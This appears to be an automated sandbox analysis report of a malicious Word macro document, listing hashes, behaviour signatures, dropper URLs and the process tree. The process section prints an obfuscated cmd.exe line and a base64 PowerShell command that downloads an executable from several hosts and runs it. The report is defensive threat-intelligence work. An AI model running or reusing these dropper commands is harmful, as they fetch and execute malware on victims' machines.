Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 10:53

General

  • Target

    JHL_D_3392853_28_08_2018.doc

  • Size

    83KB

  • MD5

    e4625136904c387f83100ce9861b2e21

  • SHA1

    3b29428a6cea904abd2903d5623fd7094914fec6

  • SHA256

    8db36a2bb5a769e6d5f1598734a7f26fcabed65197a0463a3ff1cc1486953d3c

  • SHA512

    191b87540c3f9d8ae06dd0532e22dafab46f2ab247a682f40f1a5a7bbdaa5e3b14e900a9195ef1077421695f9dfa3525d3a2b950a4eece65ad9200d0b4eebd9d

  • SSDEEP

    1536:JptJlmrJpmxlRw99NBO+aA7IrlnKchqXN076KC0It4oC:3te2dw99fx2vR1It4

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://aliu-rdc.org/QwWKYJxM

exe.dropper

http://2idiotsandnobusinessplan.com/wC7

exe.dropper

http://7naturalessences.com/DFaSvtrS

exe.dropper

http://benimdunyamkres.com/v0vig1G1

exe.dropper

http://hostmktar.com/mP

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\JHL_D_3392853_28_08_2018.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3060
      • C:\Windows\SysWOW64\CMd.exe
        CMd /v/r " ^sE^T ^ ^h^q^x==^=^A^Ag^AA^I^AACA^g^AA^IAAC^A^g^AAIAAC^A^gA^A^I^A^ACAg^AA^I^AACAgA^AI^A^0^H^A9Bw^e^Ag^G^AjBA^dAEGA^jBQf^As^D^ArB^QYA^UG^Ay^B^g^Y^As^D^A^O^B^wQ^A^Y^E^A^k^AAI^A0GA^lB^A^d^A^k^EAt^AQZ^AsGAvB^g^d^A^4G^AJ^Bw^OA^kC^AOBw^QAYEA^kAA^IAwCATB^Aa^AY^E^A^k^AAK^AUG^A^s^B^QaAYE^AkBQ^YA8^G^As^BgbAcHAv^B^AR^A^4C^A^y^BQ^Q^A^o^G^AkAweA^kH^A^y^B^A^dA^s^HAp^A^gT^A8^GA^GB^AJA^ACA^uBQ^a^A^ACATBAa^AYE^A^k^A^A^KAgG^A^jB^QYA^UG^AyBwbAY^GA^7^A^wJA^U^G^A4^B^QZA^4CAn^AwKAYGA2^B^A^U^A^QC^ArAwJ^Aw^FAn^A^wK^A^M^GA^pBA^b^A^I^G^A1B^AcAoD^A^2^Bg^b^A^U^GA^kAQPA4E^AD^B^gR^AQCA^7Aw^J^A^ADA^x^A^wN^AcCA^g^A^Q^P^A^ACAmBg^dAA^F^A^k^AwO^A^kC^AnAA^QAcCAoA^Ad^AkG^A^sBAc^AMFA^u^Aw^JAAF^A^t^B^wL^A0GAv^Bw^YA^4CAyBQ^YAQHAr^B^Q^bA^Q^HAzB^w^bAg^GAvAw^LA^o^DA^w^B^AdA^QHA^o^BAQAED^A^HBQM^AcGAp^Bgd^A^A^DA2^BwL^A0^GAvB^w^Y^A4C^AzBQZ^AI^HArB^Q^bA^EGA^5B^g^b^A^UH^Ak^BQb^Ak^GAuBQ^ZA^I^G^Av^AwL^A^oD^A^w^BAdA^Q^H^A^o^BAQ^A^MF^AyB^A^dA^YH^ATBQY^A^YE^AE^B^wLA^0^G^AvBw^Y^A^4C^Az^BQ^ZAMGAu^B^Q^Z^AMH^AzB^Q^ZAw^G^A^h^Bgc^A^UH^A0B^QYA4^GA^3Aw^L^A8CA6A^Ac^AQ^H^A0^B^A^a^AA^E^A3^A^wQ^AcH^AvAQ^b^A^8^G^A^j^B^g^LA4^G^AhBAb^AA^H^A^z^B^wc^A^U^GA^uB^Qa^A^MHA1B^g^YA^8G^A^uBA^ZA4G^Ah^B^wc^A^QHAvB^Qa^AQ^GA^p^B^g^M^A^8CAv^A^g^O^AAHA0BA^d^A^gG^A^ABQ^T^AgHA^KB^QW^A^sEAX^Bwd^A^EF^Av^A^wZ^A^I^H^AvB^g^LAM^GA^k^BgcA0C^A1B^Q^a^A^wG^A^h^B^w^L^A^8C^A^6^AAcA^QHA^0^BA^a^AcCA9^A^g^T^A^8^G^AG^B^A^J^AsD^A^0BgbA^U^G^Ap^BAb^AM^EAi^BQ^Z^AcFAu^A^AdAU^GA^O^BAIA^QH^A^j^BQZ^A^o^GAi^B^w^bA^0C^A^3BQZA^4^GA^9A^gc^AEEAqB^AJ ^e- ^l^le^h^sr^ewop& ^F^Or /^l %^Y ^In (^ ^9^8^9^ ^ ^ ^-^1 ^0)D^O ^s^E^t u^j^L^a=!u^j^L^a!!^h^q^x:~%^Y, 1!&^iF %^Y == ^0 CA^L^L %u^j^L^a:~^-^99^0% "
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2656
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -e JABqAEEAcgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABGAG8ATgA9ACcAaAB0AHQAcAA6AC8ALwBhAGwAaQB1AC0AcgBkAGMALgBvAHIAZwAvAFEAdwBXAEsAWQBKAHgATQBAAGgAdAB0AHAAOgAvAC8AMgBpAGQAaQBvAHQAcwBhAG4AZABuAG8AYgB1AHMAaQBuAGUAcwBzAHAAbABhAG4ALgBjAG8AbQAvAHcAQwA3AEAAaAB0AHQAcAA6AC8ALwA3AG4AYQB0AHUAcgBhAGwAZQBzAHMAZQBuAGMAZQBzAC4AYwBvAG0ALwBEAEYAYQBTAHYAdAByAFMAQABoAHQAdABwADoALwAvAGIAZQBuAGkAbQBkAHUAbgB5AGEAbQBrAHIAZQBzAC4AYwBvAG0ALwB2ADAAdgBpAGcAMQBHADEAQABoAHQAdABwADoALwAvAGgAbwBzAHQAbQBrAHQAYQByAC4AYwBvAG0ALwBtAFAAJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAFAAdgBmACAAPQAgACcANwAxADAAJwA7ACQARgBDAE4APQAkAGUAbgB2ADoAcAB1AGIAbABpAGMAKwAnAFwAJwArACQAUAB2AGYAKwAnAC4AZQB4AGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAaABTACAAaQBuACAAJABGAG8ATgApAHsAdAByAHkAewAkAGoAQQByAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEYAaABTACwAIAAkAEYAQwBOACkAOwBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEYAQwBOADsAYgByAGUAYQBrADsAfQBjAGEAdABjAGgAewB9AH0AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA==
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3020

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      3bdeef911c93e96b920609dc3499505c

      SHA1

      e83acf7aa7e37ea4013d2703dd8d4094f6153af0

      SHA256

      0231bd8b5362fc2927d9e2f93b77a5220857a986954cf0a2fda0a86e533ad978

      SHA512

      03572a7309f04dd0d91fc68b66c6d61e8192632f2fcabb4b036ad19f50f679792a0ccbf1005ea5b8b06e1e98a6329b44505a8fae2af451b8f896c5c6d0bb84b6

    • memory/2176-12-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-73-0x00000000712AD000-0x00000000712B8000-memory.dmp

      Filesize

      44KB

    • memory/2176-19-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-13-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-38-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-36-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-43-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-31-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-26-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-11-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-7-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-2-0x00000000712AD000-0x00000000712B8000-memory.dmp

      Filesize

      44KB

    • memory/2176-25-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-9-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-42-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-8-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-6-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-10-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-56-0x00000000712AD000-0x00000000712B8000-memory.dmp

      Filesize

      44KB

    • memory/2176-57-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

    • memory/2176-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2176-72-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2176-0-0x000000002F961000-0x000000002F962000-memory.dmp

      Filesize

      4KB